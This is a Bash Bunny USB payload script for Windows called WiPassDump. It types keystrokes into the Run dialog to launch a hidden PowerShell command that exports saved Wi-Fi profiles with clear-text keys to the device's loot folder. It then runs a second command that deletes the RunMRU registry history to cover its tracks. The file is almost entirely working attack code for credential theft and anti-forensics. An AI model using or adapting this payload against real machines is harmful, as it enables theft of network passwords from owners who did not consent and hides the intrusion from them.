# Title: WiPassDump
# Author: jafahulo -- Cred: samdeg555, hak5darren
# Version: 2.0
# Target: Windows
#
# Runs powershell script to dump clear text passwords to \loot\WiPassDump
# Runs powershell script to remove "run" prompt history - creds for this go to hak5darren.
#
# Red Blinking..........Running
# Blue Blinking.........Removing tracks
# Green.................Finished
################################################

ATTACKMODE HID STORAGE

# Create directory under loot to store passwords in
mkdir -p /root/udisk/loot/WiPassDump

LED R 200

# Open windows run console

Q GUI r
Q DELAY 1000

# enter payload and execute

Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"BashBunny\\\"\'\).NAME\; cd \$bunny\\loot\\WiPassDump\; netsh wlan export profile key=clear
Q ENTER

#Let code run, then sync

Q DELAY 5000

sync

# Wait for misc. to happen on computer

Q DELAY 1000

# Hide tracks

LED B 500

   QUACK GUI r
   QUACK DELAY 1000
   QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
   QUACK ENTER

QUACK DELAY 1000

# Done!

LED G